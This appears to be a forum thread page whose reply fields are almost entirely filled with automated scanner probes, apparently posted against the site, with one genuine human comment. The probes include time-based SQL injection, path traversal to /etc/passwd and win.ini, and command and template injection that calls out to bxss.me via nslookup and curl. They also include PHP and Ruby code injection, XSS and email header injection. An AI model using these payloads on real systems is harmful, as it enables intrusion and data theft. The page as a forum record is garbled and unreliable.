-5) OR 536=(SELECT 536 FROM PG_SLEEP(15))--
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
-1)) OR 789=(SELECT 789 FROM PG_SLEEP(15))--
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
rmqL53ty' OR 198=(SELECT 198 FROM PG_SLEEP(15))--
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
H2EEREAj') OR 387=(SELECT 387 FROM PG_SLEEP(15))--
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
kWSxSl86')) OR 94=(SELECT 94 FROM PG_SLEEP(15))--
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
FAk2VVkd'; waitfor delay '0:0:15' --
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@TkNLW
re: mirugai
-5 OR 462=(SELECT 462 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 750=(SELECT 750 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 688=(SELECT 688 FROM PG_SLEEP(15))--
re: mirugai
N4hkxoiD' OR 138=(SELECT 138 FROM PG_SLEEP(15))--
re: mirugai
HTPbdLJj') OR 243=(SELECT 243 FROM PG_SLEEP(15))--
re: mirugai
tALAVFO4')) OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@Q5O6x
re: mirugai
1MbbLEkrO
re: mirugai
response.write(9979195*9016172)
re: mirugai
'+response.write(9979195*9016172)+'
re: mirugai
<esi:include src="http://bxss.me/rpb.png"/>
re: mirugai
${10000429+9999663}
re: mirugai
"+response.write(9979195*9016172)+"
re: mirugai
%0abcc:074625.67-13555.67.df552.19990.2@bxss.me
re: mirugai
to@example.com>%0d%0abcc:074625.67-13556.67.df552.19990.2@bxss.me
re: mirugai
../../../../../../../../../../../../../../etc/passwd
re: mirugai
../../../../../../../../../../../../../../windows/win.ini
re: mirugai
file:///etc/passwd
re: mirugai
'.gethostbyname(lc('hitxi'.'smgyzjdl57ef5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(86).chr(114).chr(82).'
re: mirugai
)
re: mirugai
../../../../../../../../../../../../../../../proc/version
re: mirugai
".gethostbyname(lc("hityj"."nwetgdbme2875.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(86).chr(108).chr(71)."
re: mirugai
!(()&&!|*|*|
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: mirugai
^(#$!@#$)(()))******
re: mirugai
../../../../../../../../../../etc/passwd%00.jpg
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: mirugai
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: mirugai
echo xfelgt$()\ ycgrmq\nz^xyu||a #' &echo xfelgt$()\ ycgrmq\nz^xyu||a #|" &echo xfelgt$()\ ycgrmq\nz^xyu||a #
re: mirugai
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: mirugai
&echo zbmakb$()\ vtzppg\nz^xyu||a #' &echo zbmakb$()\ vtzppg\nz^xyu||a #|" &echo zbmakb$()\ vtzppg\nz^xyu||a #
re: mirugai
/etc/passwd
re: mirugai
|echo ehifdq$()\ xojrry\nz^xyu||a #' |echo ehifdq$()\ xojrry\nz^xyu||a #|" |echo ehifdq$()\ xojrry\nz^xyu||a #
re: mirugai
HttP://bxss.me/t/xss.html?%00
re: mirugai
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: mirugai
"+"A".concat(70-3).concat(22*4).concat(108).concat(84).concat(121).concat(85)+(require"socket"
Socket.gethostbyname("hitks"+"ksuhoqirb6a28.bxss.me.")[3].to_s)+"
re: mirugai
%2fetc%2fpasswd
re: mirugai
(nslookup hitirokncmvir46b7e.bxss.me||perl -e "gethostbyname('hitirokncmvir46b7e.bxss.me')")
re: mirugai
bxss.me/t/xss.html?%00
re: mirugai
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: mirugai
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: mirugai
'+'A'.concat(70-3).concat(22*4).concat(121).concat(67).concat(114).concat(84)+(require'socket'
Socket.gethostbyname('hitha'+'lomughgk5319f.bxss.me.')[3].to_s)+'
re: mirugai
/.././.././.././.././.././.././.././../etc/./passwd%00
re: mirugai
$(nslookup hitukyuzbtuou4bb98.bxss.me||perl -e "gethostbyname('hitukyuzbtuou4bb98.bxss.me')")
re: mirugai
Http://bxss.me/t/fit.txt
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: mirugai
&nslookup hitzqaxvktexxa02d2.bxss.me&'\"`0&nslookup hitzqaxvktexxa02d2.bxss.me&`'
re: mirugai
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: mirugai
http://bxss.me/t/fit.txt%3F.jpg
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: mirugai
&(nslookup hitmokypnzigh77ff4.bxss.me||perl -e "gethostbyname('hitmokypnzigh77ff4.bxss.me')")&'\"`0&(nslookup hitmokypnzigh77ff4.bxss.me||perl -e "gethostbyname('hitmokypnzigh77ff4.bxss.me')")&`'
re: mirugai
';print(md5(31337));$a='
re: mirugai
/etc/shells
re: mirugai
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: mirugai
|(nslookup hitmcbecijwkn03691.bxss.me||perl -e "gethostbyname('hitmcbecijwkn03691.bxss.me')")
re: mirugai
c:/windows/win.ini
re: mirugai
";print(md5(31337));$a="
re: mirugai
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: mirugai
`(nslookup hitlxmsmjmuvlab335.bxss.me||perl -e "gethostbyname('hitlxmsmjmuvlab335.bxss.me')")`
re: mirugai
'"
re: mirugai
bxss.me
re: mirugai
${@print(md5(31337))}
re: mirugai
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: mirugai
;(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")|(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")&(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")
re: mirugai
<!--
re: mirugai
${@print(md5(31337))}\
re: mirugai
file:///etc/passwd
re: mirugai
'.print(md5(31337)).'
re: mirugai
/\../\../\../\../\../\../\../etc/passwd
re: mirugai
/WEB-INF/web.xml
re: mirugai
C:\WINDOWS\system32\drivers\etc\hosts
re: mirugai
../../../../../../../../../../windows/win.ini%00.jpg
re: mirugai
/../../../../../../../../../../boot.ini
re: mirugai
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: mirugai
..\..\..\..\..\..\..\..\windows\win.ini
re: mirugai
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: mirugai
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: mirugai
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: mirugai
WEB-INF/web.xml
re: mirugai
WEB-INF\web.xml
re: mirugai
1
re: mirugai
1
re: mirugai
-1 OR 2+511-511-1=0+0+0+1 --
re: mirugai
-1 OR 3+511-511-1=0+0+0+1 --
re: mirugai
-1 OR 2+535-535-1=0+0+0+1
re: mirugai
-1 OR 3+535-535-1=0+0+0+1
re: mirugai
-1' OR 2+425-425-1=0+0+0+1 --
re: mirugai
-1' OR 3+425-425-1=0+0+0+1 --
re: mirugai
-1' OR 2+384-384-1=0+0+0+1 or 'nkBUnyV9'='
re: mirugai
-1' OR 3+384-384-1=0+0+0+1 or 'nkBUnyV9'='
re: mirugai
-1" OR 2+398-398-1=0+0+0+1 --
re: mirugai
-1" OR 3+398-398-1=0+0+0+1 --
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
5lRS7Jzu'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 306=(SELECT 306 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 792=(SELECT 792 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 782=(SELECT 782 FROM PG_SLEEP(15))--
re: mirugai
yyUpVaQd' OR 989=(SELECT 989 FROM PG_SLEEP(15))--
re: mirugai
RToHKyDP') OR 653=(SELECT 653 FROM PG_SLEEP(15))--
re: mirugai
tfYkmyfa')) OR 34=(SELECT 34 FROM PG_SLEEP(15))--
re: mirugai
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@5BSix
re: mirugai
1
re: mirugai
1
re: mirugai
1
re: mirugai
1
re: mirugai
1
re: mirugai
1
re: mirugai
1HLQMTTTV0
re: mirugai
response.write(9442265*9531645)
re: mirugai
<esi:include src="http://bxss.me/rpb.png"/>
re: mirugai
'+response.write(9442265*9531645)+'
re: mirugai
"+response.write(9442265*9531645)+"
re: mirugai
${10000166+9999646}
re: mirugai
../../../../../../../../../../../../../../etc/passwd
re: mirugai
../../../../../../../../../../../../../../windows/win.ini
re: mirugai
file:///etc/passwd
re: mirugai
redirtest.acx
re: mirugai
)
re: mirugai
../
re: mirugai
!(()&&!|*|*|
re: mirugai
^(#$!@#$)(()))******
re: mirugai
'.gethostbyname(lc('hitse'.'hbaspgknde6d3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(77).chr(106).chr(73).'
re: mirugai
".gethostbyname(lc("hitiy"."bewpkmdv2447d.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(89).chr(100).chr(68)."
re: mirugai
ctime
sleep
p0
(I30
tp1
Rp2
.
re: mirugai
gethostbyname(lc('hitsv'.'ldquaeeo66af2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(77).chr(97).chr(86)
re: mirugai
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: mirugai
HttP://bxss.me/t/xss.html?%00
re: mirugai
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: mirugai
bxss.me/t/xss.html?%00
re: mirugai
/etc/shells
re: mirugai
"+"A".concat(70-3).concat(22*4).concat(118).concat(69).concat(108).concat(88)+(require"socket"
Socket.gethostbyname("hitxv"+"peudsgwv30d7f.bxss.me.")[3].to_s)+"
re: mirugai
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: mirugai
../../../../../../../../../../../../../../etc/shells
re: mirugai
'"
re: mirugai
'+'A'.concat(70-3).concat(22*4).concat(103).concat(69).concat(117).concat(78)+(require'socket'
Socket.gethostbyname('hitjo'+'cgygjltx7aa47.bxss.me.')[3].to_s)+'
re: mirugai
';print(md5(31337));$a='
re: mirugai
c:/windows/win.ini
re: mirugai
<!--
re: mirugai
'A'.concat(70-3).concat(22*4).concat(110).concat(65).concat(110).concat(75)+(require'socket'
Socket.gethostbyname('hitxr'+'iezblgtsa44d2.bxss.me.')[3].to_s)
re: mirugai
replies
re: mirugai
";print(md5(31337));$a="
re: mirugai
bxss.me
re: mirugai
echo ukxgfa$()\ ouxpca\nz^xyu||a #' &echo ukxgfa$()\ ouxpca\nz^xyu||a #|" &echo ukxgfa$()\ ouxpca\nz^xyu||a #
re: mirugai
replies
re: mirugai
${@print(md5(31337))}
re: mirugai
Http://bxss.me/t/fit.txt
re: mirugai
&echo eehgmx$()\ xfwbpm\nz^xyu||a #' &echo eehgmx$()\ xfwbpm\nz^xyu||a #|" &echo eehgmx$()\ xfwbpm\nz^xyu||a #
re: mirugai
replies/.
re: mirugai
${@print(md5(31337))}\
re: mirugai
http://bxss.me/t/fit.txt?.jpg
re: mirugai
'"()&%<zzz><ScRiPt >6qzV(9879)</ScRiPt>
re: mirugai
|echo qnxsim$()\ bnyuvk\nz^xyu||a #' |echo qnxsim$()\ bnyuvk\nz^xyu||a #|" |echo qnxsim$()\ bnyuvk\nz^xyu||a #
re: mirugai
'.print(md5(31337)).'
re: mirugai
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitveiwsdirwua85a9.bxss.me")}}
re: mirugai
expr 9000429353 - 977371
re: mirugai
'"()&%<zzz><ScRiPt >6qzV(9886)</ScRiPt>
re: mirugai
(nslookup -q=cname hitxwubtktmpl42365.bxss.me||curl hitxwubtktmpl42365.bxss.me))
re: mirugai
9599692
re: mirugai
$(nslookup -q=cname hityxjqcdrphw19e69.bxss.me||curl hityxjqcdrphw19e69.bxss.me)
re: mirugai
'"()
re: mirugai
&nslookup -q=cname hituyxvkrnquyac00c.bxss.me&'\"`0&nslookup -q=cname hituyxvkrnquyac00c.bxss.me&`'
re: mirugai
'&&sleep(27*1000)*mlzxvd&&'
re: mirugai
&(nslookup -q=cname hitaasdprfvfg4e2bd.bxss.me||curl hitaasdprfvfg4e2bd.bxss.me)&'\"`0&(nslookup -q=cname hitaasdprfvfg4e2bd.bxss.me||curl hitaasdprfvfg4e2bd.bxss.me)&`'
re: mirugai
"&&sleep(27*1000)*glnzob&&"
re: mirugai
|(nslookup -q=cname hitnmspolenrse4c02.bxss.me||curl hitnmspolenrse4c02.bxss.me)
re: mirugai
'||sleep(27*1000)*ihveqm||'
re: mirugai
`(nslookup -q=cname hitegnfailjzf75f99.bxss.me||curl hitegnfailjzf75f99.bxss.me)`
re: mirugai
"||sleep(27*1000)*ezgvtf||"
re: mirugai
;(nslookup -q=cname hitjojqwnmvaf07a60.bxss.me||curl hitjojqwnmvaf07a60.bxss.me)|(nslookup -q=cname hitjojqwnmvaf07a60.bxss.me||curl hitjojqwnmvaf07a60.bxss.me)&(nslookup -q=cname hitjojqwnmvaf07a60.bxss.me||curl hitjojqwnmvaf07a60.bxss.me)
re: mirugai
|(nslookup${IFS}-q${IFS}cname${IFS}hitoqzlxgobzn8ef8e.bxss.me||curl${IFS}hitoqzlxgobzn8ef8e.bxss.me)
re: mirugai
&(nslookup${IFS}-q${IFS}cname${IFS}hitawlxwkkprgd04db.bxss.me||curl${IFS}hitawlxwkkprgd04db.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitawlxwkkprgd04db.bxss.me||curl${IFS}hitawlxwkkprgd04db.bxss.me)&`'
re: mirugai
o9DyEUWo
re: mirugai
*1
re: mirugai
*1
re: mirugai
*1
re: mirugai
*1
re: mirugai
-1 OR 5*5=25 --
re: mirugai
-1 OR 5*5=26 --
re: mirugai
-1 OR 5*5=25
re: mirugai
-1 OR 5*5=26
re: mirugai
*if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
-1 waitfor delay '0:0:15' --
re: mirugai
7zXFXD6y'; waitfor delay '0:0:15' --
re: mirugai
-1 OR 288=(SELECT 288 FROM PG_SLEEP(15))--
re: mirugai
-1) OR 698=(SELECT 698 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 537=(SELECT 537 FROM PG_SLEEP(15))--
re: mirugai
9sWkJISN' OR 343=(SELECT 343 FROM PG_SLEEP(15))--
re: mirugai
gjUNapV6') OR 618=(SELECT 618 FROM PG_SLEEP(15))--
re: mirugai
Gzsk0iLA')) OR 901=(SELECT 901 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
'"
re: mirugai
@@AtQzl
re: mirugai
(select 198766*667891)
re: mirugai
(select 198766*667891 from DUAL)
Thanks for the replies. I suspected the reality was less impressive than the PR.
re: thetokyogourmet
4yW8735v
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
-1 OR 2+272-272-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+272-272-1=0+0+0+1
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
YmD9VZGs'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 426=(SELECT 426 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 162=(SELECT 162 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 108=(SELECT 108 FROM PG_SLEEP(15))--
re: thetokyogourmet
W8ZV9sRO' OR 691=(SELECT 691 FROM PG_SLEEP(15))--
re: thetokyogourmet
qpGtXlPn
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
